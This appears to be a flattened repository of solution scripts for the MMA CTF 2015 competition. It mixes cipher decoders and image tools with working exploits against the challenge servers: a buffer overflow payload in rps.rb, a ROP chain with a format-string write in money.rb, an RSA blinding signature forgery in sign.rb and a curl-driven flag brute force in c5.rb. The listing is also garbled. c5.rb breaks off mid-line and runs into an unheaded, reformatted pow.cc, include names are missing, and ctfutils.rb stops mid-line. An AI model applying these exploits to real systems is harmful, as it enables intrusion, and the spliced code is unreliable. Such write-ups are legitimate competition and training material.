├── README.md ├── cannotberun.rb ├── c2.rb ├── rps.rb ├── splitted.rb ├── c4.rb ├── Makefile ├── c5.rb ├── pow.cc ├── sign.rb ├── gen_q_i.rb ├── howtouse.rb ├── qr2txt.cc ├── pat.cc ├── nagoya.cc ├── dc.rb ├── pm.rb ├── pat3.cc ├── alpha.rb ├── money.rb ├── ctfutils.rb ├── sh.c └── howtouse.dmp /README.md: -------------------------------------------------------------------------------- 1 | # mma-ctf-2015 2 | -------------------------------------------------------------------------------- /cannotberun.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | require './ctfutils' 4 | 5 | c = File.read('cannotberun.exe') 6 | c[0x3c] = 0xe8.chr 7 | 8 | print c 9 | -------------------------------------------------------------------------------- /c2.rb: -------------------------------------------------------------------------------- 1 | c = '36 36 2a 64 4b 4b 4a 21 1e 4b 1f 20 1f 21 4d 4b 1b 1d 19 4f 21 4c 1d 4a 4e 1c 4c 1b 22 4f 22 22 1b 21 4c 20 1d 4f 1f 4c 4a 19 22 1a 66' 2 | 3 | c.split.each do |v| 4 | v = v.hex 5 | if v >= 0x0 && v <= 0x99 6 | putc (v - 0x2a + 'A'.ord).chr 7 | else 8 | putc '?' 
9 | end 10 | end 11 | 12 | -------------------------------------------------------------------------------- /rps.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | require './ctfutils' 4 | 5 | if $prod 6 | pipe = TCPSocket.open('milkyway.chal.mmactf.link', 1641) 7 | else 8 | pipe = popen('./rps') 9 | end 10 | 11 | c = 'abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzab' + [0x601000+0x54].pack('Q') + [0x4008b4].pack('Q') 12 | 13 | pipe.puts c 14 | pipe.puts 'r' 15 | 16 | pipe.interactive 17 | -------------------------------------------------------------------------------- /splitted.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | require './ctfutils' 4 | 5 | buf = ' ' * 3745 6 | 7 | pcap = File.read('splitted/splitted.pcap') 8 | reg = Regexp.new("Partial Content\\s+.*?Content-Length: (\\d+).*?Content-Range: bytes (\\d+)-(\\d+).*?\r\n\r\n".encode("ASCII-8BIT"), Regexp::MULTILINE) 9 | pcap.scan(reg) do 10 | len = $1.to_i 11 | st = $2.to_i 12 | ed = $3.to_i 13 | #buf = buf[0,st] + $'[0,len] + buf[ed..-1] 14 | buf[st,len] = $'[0,len] 15 | end 16 | 17 | print buf 18 | -------------------------------------------------------------------------------- /c4.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | c = 'e3 e3 83 21 33 96 23 43 ef 9a 9a 05 18 c7 23 07 07 07 c7 9a 04 33 23 07 23 ef 12 c7 04 96 43 23 23 18 04 04 05 c7 fb 18 96 43 ef 43 ff' 4 | 5 | tbl = '04 c7 23 c3 18 96 05 9a 07 12 83 2c 1a 1b 6e 5a a0 52 3b d6 b3 29 e3 2f 84 53 d1 00 ed 20 fc b1 5b 6a cb be ef aa fb 43 4d 33 85 45 f9 02 7f 50 3c 9f a8 51 a3 40 8f 92 9d 38 f5 bc b6 da'.split 6 | 7 | a = [*'0'..'9'] + [*'A'..'Z'] + [*'a'..'z'] 8 | 9 | c.split.each do |v| 10 | i = tbl.index(v) 11 | if i 12 | putc a[i] 13 | else 14 | putc '?' 
15 | end 16 | end 17 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | all: pat pat3 sh nagoya qr2txt pow 2 | 3 | pow: pow.cc 4 | $(CXX) -o $@ $< -g -O -lssl -lcrypto 5 | 6 | pat: pat.cc 7 | $(CXX) -o $@ $< -g -O 8 | 9 | qr2txt: qr2txt.cc 10 | $(CXX) -o $@ $< -g -O -lSDL `sdl-config --cflags` 11 | 12 | pat2: pat2.cc 13 | $(CXX) -o $@ $< -g -O -std=c++11 14 | 15 | pat3: pat3.cc 16 | $(CXX) -o $@ $< -g -O -std=c++11 17 | 18 | nagoya: nagoya.cc 19 | $(CXX) -o $@ $< -g -O -std=c++11 -lSDL `sdl-config --cflags` 20 | 21 | sh: sh.c 22 | $(CC) -o $@ $< -g -O -m32 -ldl -Wl,-Ttext-segment=0x2000000 23 | 24 | howtouse: howtouse.cc 25 | $(CXX) -o $@ $< -g -O -m32 26 | -------------------------------------------------------------------------------- /c5.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | require './ctfutils' 4 | 5 | c = '60 00 0c 3a 1e 52 02 53 02 51 0c 5d 56 51 5a 5f 5f 5a 51 00 05 53 56 0a 5e 00 52 05 03 51 50 55 03 04 52 04 0f 0f 54 52 57 03 52 04 4e'.split 6 | 7 | a = [*'0'..'9'] + [*'a'..'f'] 8 | 9 | d = 'MMA{e000000000000000000000000000000000000000}' 10 | n = 5 11 | while d[n] != '}' 12 | a.each do |ch| 13 | d[n] = ch 14 | resp = `curl -d 's=#{d}' http://bow.chal.mmactf.link/~scs/crypt5.cgi 2> /dev/null` 15 | r = resp[/\/h1>(.*?) 
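#include <string.h>
#include <stdio.h>

#include <openssl/sha.h>
// NOTE(review): the header names above were lost when this listing was
// extracted (the <...> parts were stripped); these are the ones the code
// below actually uses.  SHA1_Init/Update/Final are deprecated since
// OpenSSL 3.0 but still work; EVP_Digest* is the replacement if this is
// ever rebuilt against a warnings-as-errors toolchain.

// Proof-of-work brute force: given a prefix (argv[1]), find an N-letter
// lowercase suffix such that SHA1(prefix || suffix) starts with TARGET.
static const int N = 6;

// Bytes the digest must start with, and how many of them are compared.
static const unsigned char TARGET[] = {0x12, 0x34, 0x56};
static const size_t TARGET_LEN = sizeof(TARGET);

int main(int argc, char* argv[]) {
  // The original dereferenced argv[1] unconditionally (NULL -> strlen crash).
  if (argc < 2) {
    fprintf(stderr, "usage: %s <prefix>\n", argv[0]);
    return 2;
  }

  // Hash the fixed prefix once; every candidate copies this context and
  // only absorbs its own N bytes.
  SHA_CTX ctx;
  SHA1_Init(&ctx);
  SHA1_Update(&ctx, argv[1], strlen(argv[1]));

  long M = 1;  // 26^N candidates (308,915,776 for N = 6)
  for (int i = 0; i < N; i++)
    M *= 26;

  char buf[N + 1] = {};               // N letters plus the NUL that puts() needs
  unsigned char md[SHA_DIGEST_LENGTH]; // was md[21]; SHA-1 digests are 20 bytes
  for (long i = 0; i < M; i++) {
    // base-26 digits of i, least significant letter first
    long v = i;
    for (int j = 0; j < N; j++) {
      buf[j] = 'a' + v % 26;
      v /= 26;
    }

    SHA_CTX c = ctx;
    SHA1_Update(&c, buf, N);
    SHA1_Final(md, &c);
    if (!memcmp(md, TARGET, TARGET_LEN)) {
      puts(buf);
      return 0;
    }
  }

  // The original fell off the end silently (exit 0) when nothing matched.
  fputs("no solution among 26^N candidates\n", stderr);
  return 1;
}
--------------------------------------------------------------------------------
/sign.rb:
--------------------------------------------------------------------------------
#!/usr/bin/env ruby

require './ctfutils'

# RSA blinding attack against a signing oracle.
#
# Port 44816 prints a banner, then a challenge m on the 4th line, and later
# expects a valid signature on m back.  Port 44815 signs whatever number it
# is sent (the challenge text itself is not in this repo).  Because the
# oracle signs the raw integer with no padding or hashing, signatures are
# multiplicative:  sig(m * r^e) = sig(m) * r  (mod n).  So we have the
# oracle sign the blinded value and divide the blinding factor back out.

r = 3          # blinding factor; must be coprime to n (invmod raises otherwise)
e = 65537

n = 167891001700388890587843249700549749388526432049480469518286617353920544258774519927209158925778143308323065254691520342763823691453238628056767074647261280532853686188135635704146982794597383205258532849509382400026732518927013916395873932058316105952437693180982367272310066869071042063581536335953290566509

pipe = popen('nc cry1.chal.mmactf.link 44816')
pipe.get
pipe.get
pipe.get
m = pipe.get.to_i   # challenge value

STDERR.puts "m=#{m}"

md = (r ** e * m) % n   # blinded message: m * r^e mod n

pipe2 = popen('nc cry1.chal.mmactf.link 44815')
pipe2.puts md
sd = pipe2.get.to_i     # signature on the blinded value == sig(m) * r mod n

s = (sd * invmod(r, n)) % n   # unblind: multiply by r^-1

pipe.puts s

pipe.interactive
--------------------------------------------------------------------------------
/gen_q_i.rb:
--------------------------------------------------------------------------------
#!/usr/bin/env ruby

code_size = 41

cc = ''

cc += "##{code_size}"
t = "#35.:\\,#1-:!!#"
cc += t + "#{t.size+5}*~@_"

#cc += "##{code_size}"
#t = "#35.#1-:,#92.#35.#35,#46.#44.:!!#"
#cc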
+= t + "#{t.size+5}*~@_" 14 | 15 | cc += "##{code_size}" 16 | t = "#1-^.:!!#" 17 | cc += t + "#{t.size+5}*~@;" 18 | 19 | code = cc 20 | if code.size > code_size 21 | raise 22 | end 23 | while code.size < code_size 24 | code += ' ' 25 | end 26 | 27 | c = '' 28 | d = '' 29 | 30 | code.reverse.each_byte{|b| 31 | raise if b == 0 32 | d += "##{b}" 33 | } 34 | c += d 35 | 36 | #code_size.times{|i| 37 | # c += "##{code_size-i-1}" 38 | # c += "\\" 39 | # c += "#35.," 40 | #} 41 | 42 | #c += cc 43 | 44 | print c + code 45 | 46 | __END__ 47 | 48 | code = 'dc' 49 | 50 | c = '#0' 51 | d = '' 52 | code.each_byte{|b| 53 | d += "##{b}^:#999*@^#35.," 54 | } 55 | 56 | puts c + d + code 57 | 58 | __END__ 59 | 60 | code = '__:!#99*@#35.,dc' 61 | 62 | c = '#1' 63 | d = '' 64 | 65 | code.reverse.each_byte{|b| 66 | d += "##{b}^" 67 | } 68 | 69 | c += d 70 | c += "#^#^##{d.size+10}*~" 71 | c += "@" 72 | 73 | puts c + code 74 | -------------------------------------------------------------------------------- /howtouse.rb: -------------------------------------------------------------------------------- 1 | dmp = %q(0xffffcd9c: 0xf7d12f5b 0x00000000 0x00000000 0x10001080 2 | 0xffffcdac: 0x10001080 0x10001070 0x10001110 0x10001060 3 | 0xffffcdbc: 0x10001030 0x100010e0 0x10001040 0x10001100 4 | 0xffffcdcc: 0x10001090 0x10001030 0x10001010 0x10001090 5 | 0xffffcddc: 0x10001090 0x100010a0 0x10001060 0x10001030 6 | 0xffffcdec: 0x100010f0 0x100010e0 0x100010a0 0x100010b0 7 | 0xffffcdfc: 0x100010d0 0x10001100 0x100010e0 0x10001040 8 | 0xffffce0c: 0x100010f0 0x100010f0 0x10001040 0x10001100 9 | 0xffffce1c: 0x10001050 0x10001050 0x100010e0 0x10001050 10 | 0xffffce2c: 0x10001060 0x10001010 0x10001100 0x10001050 11 | 0xffffce3c: 0x10001100 0x10001020 0x100010c0 0x100010b0 12 | 0xffffce4c: 0x10001050 0x10001040 0x100010f0 0x10001120) 13 | 14 | c = File.read('howtouse.dmp') 15 | 16 | dmp.split[4..-1].each do |d| 17 | next if d =~ /:/ 18 | d.sub!(/0x/, '') 19 | ch = c[/#{d}:\s+.*?mov\s+\$0x(\h+),/, 1] 20 
| raise d if !ch 21 | putc ch.hex 22 | end 23 | 24 | 25 | -------------------------------------------------------------------------------- /qr2txt.cc: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | Uint32 getpixel(SDL_Surface *surface, int x, int y) { 4 | int bpp = surface->format->BytesPerPixel; 5 | Uint8 *p = (Uint8 *)surface->pixels + y * surface->pitch + x * bpp; 6 | 7 | switch(bpp) { 8 | case 1: 9 | return *p; 10 | 11 | case 2: 12 | return *(Uint16 *)p; 13 | 14 | case 3: 15 | if(SDL_BYTEORDER == SDL_BIG_ENDIAN) 16 | return p[0] << 16 | p[1] << 8 | p[2]; 17 | else 18 | return p[0] | p[1] << 8 | p[2] << 16; 19 | case 4: 20 | return *(Uint32 *)p; 21 | 22 | default: 23 | return 0; 24 | } 25 | } 26 | 27 | void putpixel(SDL_Surface *surface, int x, int y, Uint32 pixel) { 28 | int bpp = surface->format->BytesPerPixel; 29 | Uint8 *p = (Uint8 *)surface->pixels + y * surface->pitch + x * bpp; 30 | 31 | switch(bpp) { 32 | case 1: 33 | *p = pixel; 34 | break; 35 | 36 | case 2: 37 | *(Uint16 *)p = pixel; 38 | break; 39 | 40 | case 3: 41 | if(SDL_BYTEORDER == SDL_BIG_ENDIAN) { 42 | p[0] = (pixel >> 16) & 0xff; 43 | p[1] = (pixel >> 8) & 0xff; 44 | p[2] = pixel & 0xff; 45 | } else { 46 | p[0] = pixel & 0xff; 47 | p[1] = (pixel >> 8) & 0xff; 48 | p[2] = (pixel >> 16) & 0xff; 49 | } 50 | break; 51 | 52 | case 4: 53 | *(Uint32 *)p = pixel; 54 | break; 55 | } 56 | } 57 | 58 | int main() { 59 | SDL_Init(SDL_INIT_VIDEO); 60 | SDL_Surface* s = SDL_LoadBMP("qr.bmp"); 61 | 62 | for (int y = 0; y < s->h; y+=8) { 63 | for (int x = 0; x < s->w; x+=8) { 64 | Uint32 p = getpixel(s, x, y); 65 | Uint8 r, g, b; 66 | SDL_GetRGB(p, s->format, &r, &g, &b); 67 | int v = (r + g + b) / 2; 68 | if (v > 200) 69 | printf("_"); 70 | else if (v > 50) 71 | printf("?"); 72 | else 73 | printf("X"); 74 | } 75 | puts(""); 76 | } 77 | } 78 | -------------------------------------------------------------------------------- /pat.cc: 
-------------------------------------------------------------------------------- 1 | #include 2 | 3 | #include 4 | #include 5 | #include 6 | 7 | using namespace std; 8 | 9 | static const int N = 3; 10 | 11 | int POS(int x, int y) { 12 | return x + y * N; 13 | } 14 | 15 | int X(int p) { 16 | return p % N; 17 | } 18 | 19 | int Y(int p) { 20 | return p / N; 21 | } 22 | 23 | int sign(int v) { 24 | return v > 0 ? 1 : v < 0 ? -1 : 0; 25 | } 26 | 27 | struct State { 28 | int pos; 29 | vector route; 30 | 31 | bool has(int i) const { 32 | return find(route.begin(), route.end(), i) != route.end(); 33 | } 34 | }; 35 | 36 | int main() { 37 | queue q; 38 | for (int i = 0; i < N * N; i++) { 39 | State st; 40 | st.pos = i; 41 | st.route.push_back(i); 42 | q.push(st); 43 | } 44 | 45 | int cnt = 0; 46 | while (!q.empty()) { 47 | State st = q.front(); 48 | q.pop(); 49 | if (st.route.size() >= 4) 50 | cnt++; 51 | 52 | int px = X(st.pos); 53 | int py = Y(st.pos); 54 | for (int i = 0; i < N * N; i++) { 55 | int x = X(i); 56 | int y = Y(i); 57 | int sx = x - px; 58 | int sy = y - py; 59 | int dx = abs(sx); 60 | int dy = abs(sy); 61 | 62 | if (dx == 0 && dy == 0) 63 | continue; 64 | 65 | if (dx == 0 && dy != 1 || 66 | dy == 0 && dx != 1 || 67 | dx == dy && dx != 1) { 68 | bool ok = true; 69 | int cx = px; 70 | int cy = py; 71 | while (true) { 72 | cx += sign(sx); 73 | cy += sign(sy); 74 | if (cx == x && cy == y) 75 | break; 76 | if (!st.has(POS(cx, cy))) { 77 | ok = false; 78 | break; 79 | } 80 | } 81 | if (!ok) 82 | continue; 83 | } 84 | 85 | if (st.has(i)) 86 | continue; 87 | 88 | State nst = st; 89 | nst.pos = i; 90 | nst.route.push_back(i); 91 | q.push(nst); 92 | } 93 | } 94 | 95 | printf("%d\n", cnt); 96 | } 97 | -------------------------------------------------------------------------------- /nagoya.cc: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | Uint32 getpixel(SDL_Surface *surface, int x, int y) { 4 | int bpp = 
surface->format->BytesPerPixel; 5 | Uint8 *p = (Uint8 *)surface->pixels + y * surface->pitch + x * bpp; 6 | 7 | switch(bpp) { 8 | case 1: 9 | return *p; 10 | 11 | case 2: 12 | return *(Uint16 *)p; 13 | 14 | case 3: 15 | if(SDL_BYTEORDER == SDL_BIG_ENDIAN) 16 | return p[0] << 16 | p[1] << 8 | p[2]; 17 | else 18 | return p[0] | p[1] << 8 | p[2] << 16; 19 | case 4: 20 | return *(Uint32 *)p; 21 | 22 | default: 23 | return 0; 24 | } 25 | } 26 | 27 | void putpixel(SDL_Surface *surface, int x, int y, Uint32 pixel) { 28 | int bpp = surface->format->BytesPerPixel; 29 | Uint8 *p = (Uint8 *)surface->pixels + y * surface->pitch + x * bpp; 30 | 31 | switch(bpp) { 32 | case 1: 33 | *p = pixel; 34 | break; 35 | 36 | case 2: 37 | *(Uint16 *)p = pixel; 38 | break; 39 | 40 | case 3: 41 | if(SDL_BYTEORDER == SDL_BIG_ENDIAN) { 42 | p[0] = (pixel >> 16) & 0xff; 43 | p[1] = (pixel >> 8) & 0xff; 44 | p[2] = pixel & 0xff; 45 | } else { 46 | p[0] = pixel & 0xff; 47 | p[1] = (pixel >> 8) & 0xff; 48 | p[2] = (pixel >> 16) & 0xff; 49 | } 50 | break; 51 | 52 | case 4: 53 | *(Uint32 *)p = pixel; 54 | break; 55 | } 56 | } 57 | 58 | int main() { 59 | SDL_Init(SDL_INIT_VIDEO); 60 | SDL_Surface* s = SDL_LoadBMP("nagoya.bmp"); 61 | SDL_Surface* o = SDL_CreateRGBSurface(SDL_SWSURFACE, s->w, s->h, 32, 62 | 0, 0, 0, 0); 63 | 64 | for (int y = 0; y < s->h; y++) { 65 | for (int x = 0; x < s->w; x++) { 66 | Uint32 p = getpixel(s, x, y); 67 | //printf("%d %d %u\n", x, y, p&1); 68 | if (p & 1) { 69 | putpixel(o, x, y, 0xffffffff); 70 | } 71 | } 72 | } 73 | SDL_SaveBMP(o, "out.bmp"); 74 | } 75 | -------------------------------------------------------------------------------- /dc.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | # for Digital Circuit 4 | 5 | require './ctfutils' 6 | 7 | def get_c1(v) 8 | res = `vvp ./digital_circuit/program +input=#{$input + v * 2 ** (128+64)}` 9 | res = res.force_encoding('ASCII-8BIT') 10 | if res !~ 
/\(c1\)=\s*(\d+)/ 11 | raise res 12 | end 13 | $1.to_i 14 | end 15 | 16 | 17 | mul = 0b00000000000000000000000000000000000000000000000000100010010010000100010101001100010011000100111100100001001000010010001000100001 18 | xorv = 0b00001110111000011011000000000101000110001011000101111110100100000111110001100000110010110000100011000101110010000001011110110010 19 | c40 = invmod(mul, 2**128) * xorv % (2**128) 20 | 21 | c20 = 6442758005744298871 * 2**128 22 | 23 | $input = c40 + c20 24 | 25 | base = get_c1(0) 26 | 27 | a = [] 28 | 64.times{ 29 | a << [] 30 | } 31 | 32 | diffs = [] 33 | 34 | STDERR.puts '%b' % base 35 | 64.times{|i| 36 | diff = base ^ get_c1(2 ** i) 37 | diffs << diff 38 | 39 | d = diff 40 | j = 0 41 | while d != 0 42 | if d % 2 == 1 43 | a[j] << i 44 | end 45 | d >>= 1 46 | j += 1 47 | end 48 | } 49 | 50 | STDERR.puts a.inspect 51 | STDERR.puts diffs.inspect 52 | 53 | c10 = 0 54 | 55 | c = base 56 | 64.times{|b| 57 | if a[b].size != 1 58 | raise 59 | end 60 | 61 | if a[b][0] != b 62 | raise 63 | end 64 | 65 | if (c >> b) % 2 == 1 66 | STDERR.puts "#{b} #{1< 2 | #include 3 | #include 4 | 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | using namespace std; 12 | 13 | static const int N = 4; 14 | 15 | int POS(int x, int y) { 16 | return x + y * N; 17 | } 18 | 19 | int X(int p) { 20 | return p % N; 21 | } 22 | 23 | int Y(int p) { 24 | return p / N; 25 | } 26 | 27 | int sign(int v) { 28 | return v > 0 ? 1 : v < 0 ? 
-1 : 0; 29 | } 30 | 31 | struct State { 32 | int pos; 33 | int done; 34 | double len; 35 | 36 | State() { 37 | pos = -1; 38 | done = 0; 39 | len = 0; 40 | } 41 | 42 | void set(int p) { 43 | pos = p; 44 | done |= 1 << p; 45 | } 46 | 47 | bool has(int i) const { 48 | return (done >> i) & 1; 49 | } 50 | 51 | int id() const { 52 | return done * 16 + pos; 53 | } 54 | }; 55 | 56 | int main(int argc, char* argv[]) { 57 | queue q; 58 | 59 | { 60 | int i = atoi(argv[1]); 61 | State st; 62 | st.set(i); 63 | q.push(st); 64 | } 65 | 66 | map done; 67 | 68 | double max_len = 0; 69 | int cnt = 0; 70 | while (!q.empty()) { 71 | State st = q.front(); 72 | q.pop(); 73 | 74 | auto p = done.emplace(st.id(), st.len); 75 | if (!p.second) { 76 | if (p.first->second > st.len) 77 | continue; 78 | p.first->second = st.len; 79 | } 80 | 81 | if (max_len < st.len) { 82 | max_len = st.len; 83 | fprintf(stderr, "max=%f cnt=%d\n", max_len, cnt); 84 | } 85 | cnt++; 86 | 87 | int px = X(st.pos); 88 | int py = Y(st.pos); 89 | for (int i = 0; i < N * N; i++) { 90 | int x = X(i); 91 | int y = Y(i); 92 | int sx = x - px; 93 | int sy = y - py; 94 | int dx = abs(sx); 95 | int dy = abs(sy); 96 | 97 | if (dx == 0 && dy == 0) 98 | continue; 99 | 100 | if (dx == 0 && dy != 1 || 101 | dy == 0 && dx != 1 || 102 | dx == dy && dx != 1) { 103 | bool ok = true; 104 | int cx = px; 105 | int cy = py; 106 | while (true) { 107 | cx += sign(sx); 108 | cy += sign(sy); 109 | if (cx == x && cy == y) 110 | break; 111 | if (!st.has(POS(cx, cy))) { 112 | ok = false; 113 | break; 114 | } 115 | } 116 | if (!ok) 117 | continue; 118 | } 119 | 120 | if (st.has(i)) 121 | continue; 122 | 123 | State nst(st); 124 | nst.set(i); 125 | nst.len += sqrt(dx * dx + dy * dy); 126 | q.push(nst); 127 | } 128 | } 129 | 130 | printf("%d\n", cnt); 131 | } 132 | -------------------------------------------------------------------------------- /alpha.rb: -------------------------------------------------------------------------------- 1 | public 2 
| def i n 3 | def each 4 | yield succ end 5 | for r in n 6 | end 7 | r end 8 | def each 9 | clear 10 | concat i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i size 11 | concat i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i size 12 | concat i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i size 13 | concat i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i size 14 | def each 15 | read end 16 | for i in open self 17 | end 18 | i 19 | end 20 | for i in inspect 21 | end 22 | 23 | 24 | __END__ 25 | 26 | class String 27 | def coerce 28 | 32 29 | end 30 | end 31 | 32 | class Integer 33 | def each 34 | p quo "hoge" 35 | end 36 | end 37 | 38 | for i in 40 39 | end 40 | 41 | 42 | class String 43 | alias each bytes end 44 | class A 45 | for A in name 46 | end end 47 | 48 | class String 49 | def each 50 | for c in bytes 51 | case c 52 | when 65 53 | concat 59 54 | when 66 55 | concat 46 56 | when 67 57 | concat 39 58 | when 68 59 | concat 32 60 | else 61 | concat c 62 | end 63 | end 64 | print self 65 | eval self 66 | end 67 | end 68 | 69 | class AputsDFileBreadCflagC 70 | for i in name 71 | end 72 | end 73 | 74 | public 75 | def i n 76 | def each 77 | yield succ end 78 | for r in n 79 | end 80 | r end 81 | 82 | class File 83 | def each 84 | p read 85 | end end 86 | 87 | class String 88 | def each 89 | clear 90 | concat i i i i i i i i i i i i i i i i i i i i i i i i i i i i i 
i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i size 91 | concat i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i size 92 | concat i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i size 93 | concat i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i size 94 | for f in open self 95 | end end end 96 | for i in String nil 97 | end 98 | 99 | 100 | exit 101 | -------------------------------------------------------------------------------- /money.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | require './ctfutils' 4 | 5 | if $prod 6 | pipe = TCPSocket.open('pwn1.chal.mmactf.link', 21345) 7 | pipe2 = TCPSocket.open('pwn1.chal.mmactf.link', 21345) 8 | else 9 | pipe = popen('./moneygame_easy') 10 | pipe2 = popen('./moneygame_easy') 11 | end 12 | 13 | log = [] 14 | 54.times{ 15 | s = [] 16 | while true 17 | l = pipe2.get 18 | if l =~ /Stock #(\d): \$(\d+)\.(\d+)/ 19 | s[$1.to_i-1] = $2.to_i * 100 + $3.to_i 20 | if $1.to_i == 3 21 | break 22 | end 23 | end 24 | end 25 | log << s 26 | pipe2.puts 'Rest' 27 | } 28 | 29 | pipe2.close 30 | 31 | strats = [] 32 | 53.times{|w| 33 | 1.upto(53) do |t| 34 | break if !log[w+t] 35 | 36 | prev = log[w] 37 | now = log[w+t] 38 | 39 | 3.times{|i| 40 | if now[i] > prev[i] 41 | d = (now[i].to_f / prev[i] - 1.0) / (t + 1) 42 | strats << [d, w, t, i] 43 | end 44 | } 45 | end 46 | } 47 | 48 | cmds = [nil] * 54 49 | 50 | p strats.size 51 | 
52 | strats.sort_by!{|d,*_|-d} 53 | 54 | strats.each do |d, w, t, i| 55 | if !cmds[w,t+1].all?{|c|c==nil} 56 | next 57 | end 58 | 59 | cmds[w] = ['Buy', i] 60 | (w+1).upto(w+t-1){|_|cmds[_] = 'Rest'} 61 | cmds[w+t] = ['Sell', i] 62 | end 63 | 64 | money = 1000000 65 | num = 0 66 | cmds.each_with_index do |c, w| 67 | puts "= week #{w} #{c}" 68 | if !c || c == 'Rest' 69 | pipe.puts c 70 | else 71 | pipe.puts c[0] 72 | pipe.puts c[1] + 1 73 | if c[0] == 'Buy' 74 | num = money / log[w][c[1]] 75 | money -= num * log[w][c[1]] 76 | else 77 | money += num * log[w][c[1]] 78 | end 79 | pipe.puts num 80 | end 81 | end 82 | 83 | puts "Expected: #{money}" 84 | 85 | pipe.wait_until(/What your name\? : /) 86 | 87 | c = '' 88 | 89 | fclose_plt = 0x804a278 90 | fflush_plt = 0x804a270 91 | 92 | pop11_addr = 0x08048d59 93 | #pop11_addr = 0xdeadbeef 94 | 95 | pop4_addr = 0x08048d5c 96 | #pop4_addr = 0xdeadbeef 97 | 98 | call_fopen = 0x8048c61 99 | 100 | flag2_addr = 0x0804a168 + 0xdf0 101 | #flag2_addr = 0x804a2b4 102 | 103 | pop_addr = 0x080484b5 104 | 105 | c = '' 106 | 107 | rop = [0xdeadbeea, 0x0804a168 + 0xe00] 108 | rop += [call_fopen, flag2_addr, 0x8048f50] 109 | rop += [0xdeadbeea, 0xdeadbeeb, 0xdeadbeec, 0xdeadbeed] * 2 110 | 4.times{ 111 | #rop += [0x8048520, 0x080484b5, 0x08048000 + 2768] 112 | rop += [0x8048cbc] 113 | } 114 | rps = rop.size 115 | 116 | c += rop.pack("L*") 117 | 4.times{|i| 118 | #c += [fflush_plt+i].pack("L*") 119 | c += [fclose_plt+i].pack("L*") 120 | } 121 | 6.times{|i| 122 | c += [flag2_addr+i].pack("L*") 123 | } 124 | 125 | pn = c.size 126 | a = pop11_addr 127 | 4.times{|i| 128 | n = a & 0xff 129 | c += "%#{(n-pn)%256}c%#{7+rps+i}$hhn" 130 | a >>= 8 131 | pn = n 132 | } 133 | 134 | #pn = c.size 135 | 6.times{|i| 136 | n = "flag2\0"[i].ord & 0xff 137 | c += "%#{(n-pn)%256}c%#{7+4+rps+i}$hhn" 138 | a >>= 8 139 | pn = n 140 | } 141 | 142 | if c.size > 0x100 143 | puts c.size 144 | raise c 145 | end 146 | 147 | #c += 'X' * 50 148 | 149 | if 
c.include?("\n") 150 | puts 'fuck' 151 | raise c 152 | end 153 | 154 | 155 | pipe.puts c 156 | File.write('rop', "Rest\n"*54+c) 157 | 158 | #pipe.close_write 159 | 160 | pipe.interactive 161 | -------------------------------------------------------------------------------- /ctfutils.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | require 'io/nonblock' 4 | 5 | require 'socket' 6 | 7 | def File.read(filename) 8 | File.open(filename, 'r:binary') do |f| 9 | f.read 10 | end 11 | end 12 | 13 | def File.write(filename, s) 14 | File.open(filename, 'w:binary') do |f| 15 | f.write(s) 16 | end 17 | end 18 | 19 | def install_io_log_hook(pipe, bn) 20 | log_in = "/tmp/#{bn}.in.log" 21 | log_out = "/tmp/#{bn}.out.log" 22 | File.delete(log_in) if File.exist?(log_in) 23 | File.delete(log_out) if File.exist?(log_out) 24 | orig_gets = pipe.method(:gets) 25 | orig_read = pipe.method(:read) 26 | orig_write = pipe.method(:write) 27 | pipe.define_singleton_method(:gets, proc do |*a| 28 | r = orig_gets[*a] 29 | File.open(log_in, 'a') do |of| 30 | of.write(r) 31 | end 32 | r 33 | end) 34 | pipe.define_singleton_method(:read, proc do |*a| 35 | r = orig_read[*a] 36 | File.open(log_in, 'a') do |of| 37 | of.write(r) 38 | end 39 | r 40 | end) 41 | pipe.define_singleton_method(:write, proc do |*a| 42 | orig_write[*a] 43 | File.open(log_out, 'a') do |of| 44 | of.write(*a) 45 | end 46 | end) 47 | end 48 | 49 | def socket(*a) 50 | s = TCPSocket.new(*a) 51 | install_io_log_hook(s, a*':') 52 | s 53 | end 54 | 55 | def popen(a) 56 | pipe = IO.popen(a, 'r+:binary') 57 | bn = File.basename(a) 58 | install_io_log_hook(pipe, bn) 59 | pipe 60 | end 61 | 62 | class IO 63 | def get(n=nil) 64 | if 